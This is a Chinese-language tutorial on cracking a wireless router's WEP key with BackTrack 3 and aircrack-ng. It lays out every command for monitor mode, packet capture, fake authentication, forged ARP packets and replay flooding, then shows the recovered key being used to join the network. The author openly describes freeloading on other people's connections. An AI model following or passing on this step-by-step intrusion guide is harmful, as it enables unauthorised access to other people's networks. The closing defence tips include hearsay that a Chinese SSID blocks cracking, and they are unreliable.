無線路由器密碼破解——需要的工具：

軟件：

① BackTrack 3（簡稱BT3）

BT3有光盤版，硬盤版還有U盤版，由于本本基本上可以刻碟，我就懶得弄那些U盤版，硬盤版了，直接刻了張碟，所以這篇教程使用光盤版。

下載地址：

U盤版：http://backtrack.unixheads.org/bt3final_usb.iso

光盤版：http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd

硬件：

② 一臺筆記本，或者臺式機配無線網卡。

如果是筆記本，在設備管理器中查看一下你的網卡類型，我的是Intel 3945ABG的，現在市面上大部分筆記本都是用的這個網卡，所以，這篇教程主要針對這個網卡，如果不是，可能也能夠破解成功，我也就沒有測試了，臺式機用的無線網卡同理，也有支持BT3的。

圖01-查看網卡

無線路由器密碼破解——運行程序

插入光盤開機等待幾分鐘，有個選擇模式的界面，一般選擇第一個就會進入BT3的圖形界面，如圖02，如果不能進去，輸入賬號root，密碼toor，然后輸入startx，也可以進去，但是我測試過，我的本本進不去，網上找到的答案是顯卡不支持（ATI 2400 XT）

進不去第一個的嘗試選擇第四個圖形模式，我的可以進去，如果這個也進不去，那就每個圖形模式都試試，都不行的話，那就是RP問題了，你的本本顯卡不支持。

圖02-進入后界面

然后點右下角的一個黑黑的顯示器一樣的圖標打開一個控制臺，如圖03：

圖03-打開控制臺

#p#

無線路由器密碼破解——開始輸入命令

①ifconfig -a

這是查看當前網卡信息的，-a是顯示全部網卡，如果沒有這個參數，就無法顯示出無線網卡。這條命令可以查看當前網卡的MAC地址，其中，無線網卡的MAC地址是我們需要的，就在HWaddr后面的6個16進制字符，后面的那么多00是不要的，應該是為了IP6做準備的。如圖04。

圖04-查看網卡信息

為了避免信息泄露，我把我的MAC地址和要破解的AP（Access Point，接入點）的MAC地址的后2個字節都隱藏了，可以看到，現在的無線網卡名稱是wlan0，這是BT3自動加載的iwl3945驅動起的名字，而這個驅動是不支持之后的破解工作的，所以我們需要換個驅動。

②modprobe -r iwl3945

卸載當前iwl3945驅動。

③modprobe ipwraw

加載ipwraw驅動，這個驅動是可以正常使用的。加載之后再輸入ifconfig –a試試，就會發現wlan0不見了，出來了個wifi0，如圖05，這就是ipwraw給我們的網卡起的名字。這個名字之后會多次用到。這時候也需要把自己的MAC地址記住，最好是在桌面新建一個文本文件，然后復制進去，方便之后的命令調用。

圖05-加載3945驅動

④airomon-ng start wifi0

這條命令是設置無線網卡為監聽模式，因為Windows下這個很難實現，而Linux由于開源，所以大部分黑客軟件都是Linux平臺下的，我剛開始用BT3的時候就因為iwl3945驅動不能使用監聽模式而卡在這里了。設置成功后，如圖06。

圖06-設置監聽模式

⑤airodump-ng wifi0

既然要破解，那么總得有目標吧，這條命令就是檢測當前所能搜索到的所有無線網絡信號。其中包括頻道，信號強度等信息。運行后如圖07。

圖07-查看存在AP

里面的幾個參數，解釋一下，網上也有解釋的，但是解釋得不太清楚。

BSSID——這個就是路由器的MAC地址了，我要破解的是下面那個，上面那個信號太差。

PWR——這個是信號強度，但是我的電腦顯示不出來，顯示不出來也沒關系，不妨礙之后的破解的，只要在Windows中顯示信號很好就可以了。

Beacons——這個是路由器對外發包，可能是SSID廣播，我也不太清楚，如果看到這個數據在漲，就代表這個AP還行，一般是1秒漲20~30吧。太慢了就有可能因為信號的原因破解失敗。

#Data——這個數據最最重要，這個代表可以用于破解的包，一般這個數據到達1W+，一般的64位的WEP密碼就能夠破解了。之后我們要做的，就是等待他到達1W，如果數據增長很緩慢（幾分鐘才增加1），那就只好用另一種方法了，就是發包攻擊，這個在后面有介紹。

#/s——DATA增加的速度。

CH——頻道，總共有11個頻道，可以看到，我要破解的AP的頻道是11。

MB——無線的速度，現在一般都是54MB的了。

CIPHER——加密方式，如果是WEP，就能夠用這樣的方式破解，如果是WPA/WPA2，目前就只能暴力破解了，話說我現在還不知道怎么暴力破解…等你破解出來的密碼都是12345，1234567890之類的密碼時，你就會覺得自己付出的和得到的完全不成比例…TAT。在這里我們只考慮WEP加密的情況。

AUTH——這個應該是authorization的縮寫，也就是授權的意思，我也不明白這個有什么用。可能路由器要給客戶端發包，就需要驗證客戶端權限。現在這里是空的，之后會有值的。

ESSID——簡單理解，這個就是路由器的名字了。

這一步，我們要做的就是確定需要破解的路由器和它的MAC地址，DATA值增長速度比較快，或者在Windows下信號比較好，或者PWR比較高的，優先。同樣，可以把MAC地址寫到文本文件中去。

#p#

⑥airodump-ng --ivs -w god -c 11 wifi0

這個命令是檢測某個頻道的路由器發包，并且保存可用包(也就是#DATA)到一個文件god，這個god是可以改成你喜歡的名字的，但是自己要記住…

參數中，

-c是指頻道，后面跟著我要破解的路由器的信號頻道，也就是11。

wifi0是我的網卡名稱。

輸入完這個命令后，這個窗口就不用關了，它要一直抓包的，我們稱之為1號窗口。

這時候我們重新打開一個控制臺，也就是黑框框。輸入之后的命令：

⑦aireplay-ng -1 0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0

-a后面跟著的是目標MAC地址。

-h后面跟著的是本機的無線網卡MAC地址。

wifi0是本機無線網卡名稱。

這條命令是獲取授權，測試模擬發包攻擊，具體有什么用，我不太清楚… 可能是測試能否通過發包進行攻擊吧。成功后會出現如下信息：Association successful :-)，然后上面那個窗口中AUTH欄值變成OPN。

圖08-測試連接

⑧aireplay-ng -5 -b 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0

參數中：

-5是aireplay這個程序使用的模式，無需深究。

-b后面跟著的是目標MAC地址。

-h后面跟著的是本機的無線網卡MAC地址。

wifi0是本機無線網卡名稱。

這個命令，我的理解是是獲取到一個特定的包制作攻擊源，然后可以用這個攻擊源進行發包攻擊。這一步是最難成功的，往往失敗就是因為這一步。如果你選擇的AP等了半天DATA值還是0，可以放棄那個了。輸入命令后，就開始抓包了，下面的數據會漲，如圖09，等抓到一個有用的包的時候，它會問你是否用這個包，如圖10，按Y，然后回車就OK。

但是往往獲取到的包都是攻擊失敗的，如圖11，這樣就只好繼續等了，它會自動開始下一輪抓包的，所以，破解也是需要RP的。

圖09-獲取可用包

圖10-獲取到可用包

圖11-攻擊失敗

再說說DATA值為什么會保持在0或者增長緩慢。如果這個AP是有客戶端無線連接的，那么它發的數據就多，獲取到可用包的幾率就大。如果沒客戶端連接，它做的工作就是不斷向外發送SSID廣播，簡單說就是告訴大家，我是一個路由器，我的名字是****，我的信號有多大，我有沒有密碼等等。這樣的包，可用來破解密碼的（也就是DATA包）是鳳毛麟角啊，一般5000個包能出一個都算不錯了，在等待的過程中，可以打開另一個窗口，輸入第9條命令

⑨aircrack-ng -b 00:23:CD:89:**:** god-01.ivs

參數中-b后面跟著的是目標MAC地址。這個就是正式破解了，其中god-01.ivs是我們抓的數據包，也就是DATA包保存成的文件，如果你多次使用airodump抓包，那么你可以去root目錄看看最新生成的文件名，然后相應變更。這個程序就用這些抓到的DATA包來計算出密碼。運行命令后如圖12。

圖12-嘗試破解失敗

可以看到破解失敗了。只有34個IVs（DATA包），不失敗才怪呢，之前說過一般要1W+才可以的。第2個窗口中，等啊等，終于等到一個有用的包了，成功信息如圖13

圖13-獲取到可用于攻擊的包

成功后程序會生成一個xor文件fragment-0806-150830.xor，記住這個就好，下一條命令要用。

接著輸入：

⑩packetforge-ng -0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** -k 255.255.255.255 –l 255.255.255.255 -y fragment-0806-150830.xor -w moon

參數中：

-a后面跟著的是目標MAC地址。

-h后面跟著本地無線網卡MAC地址。

-y是上一步中生成的那個xor文件

-w是生成的ARP包文件名，我填了moon，可更改，也要記住。

這個命令是偽造ARP包，用于ARP攻擊。

最后一條命令，就讓路由器做臨死前的掙扎吧…

⑪aireplay-ng -2 -r moon -x 512 wifi0

moon是上一步保存的ARP包文件名。

512是攻擊線程，一般512夠了，1024我怕大了，沒敢弄。

wifi0是網卡名稱。

輸入完這一條，就可以看到第1個窗口中的DATA值暴增，如圖14。

圖14-發包攻擊

圖上可以看到，DATA的增長速度是361個/s。然后我們就切換到第3個窗口，就是aircrack那個窗口看看吧，等DATA到了5000，就會自動開始 破解，如果沒成功，DATA到達10000又會破解一次。這一切都發生地很迅速。很快，密碼出來了，如圖15。

圖15-破解成功

從圖15可以看到，密碼就是8264287788。由于WEP中64位加密是5個ASCII碼或者10個16進制字符，所以，我們可以切換Windows，然后用8264287788連接上去，如圖16，信號很好哦！

圖16-無線連接

#p#

無線路由器密碼破解——總結

1.把所有用到的命令都總結一下，[]內的是需要更改的，方便大家對照修改。

①ifconfig –a

②modprobe -r iwl3945

③modprobe ipwraw

④airomon-ng start [網卡名]

⑤airodump-ng [網卡名]

⑥airodump-ng --ivs -w [DATA包文件名] -c [頻道] [網卡名]

⑦aireplay-ng -1 0 -a [目標MAC] -h [網卡MAC] [網卡名]

⑧aireplay-ng -5 -b [目標MAC] -h [網卡MAC] [網卡名]

⑨aircrack-ng -b [目標MAC] [DATA包文件名]-0*.ivs

⑩packetforge-ng -0 -a [目標MAC] -h [網卡MAC] -k 255.255.255.255 –l 255.255.255.255 -y [上一步的xor文件名] -w [攻擊包文件名]

⑪aireplay-ng -2 -r [攻擊包文件名] -x [攻擊線程] [網卡名]

2.在本教程中:

[網卡名] ——wifi0

[DATA包文件名]——god

[頻道]——11

[目標MAC]——00:23:CD:89:**:**

[網卡MAC]——00-1F-3C-5B-**-**

[上一步的xor文件名]——fragment-0806-150830.xor

[攻擊包文件名]——moon

[攻擊線程]——512

3.怎么樣防范自己的AP被像我這樣的不速之客破解然后蹭網吧。

①你可以關閉SSID廣播，這樣別人就搜索不到你的無線信號了。

②你可以設置WPA/WPA2加密，現在主流的路由器都支持這個功能，為什么不用呢？

③你可以把你的SSID改成中文，雖然我沒試過，但是網上貌似說這樣就不可以破解了。

④你可以設置MAC地址綁定，但是可以查看合法MAC并偽裝MAC的方式破解。

無線路由器密碼破解教程的敘述結束了，有什么問題，可以查看我們網站的相關專題，還有本教程旨在普及無線網絡知識，加強大家對無線網絡安全問題的認識，希望大家不要拿來做壞事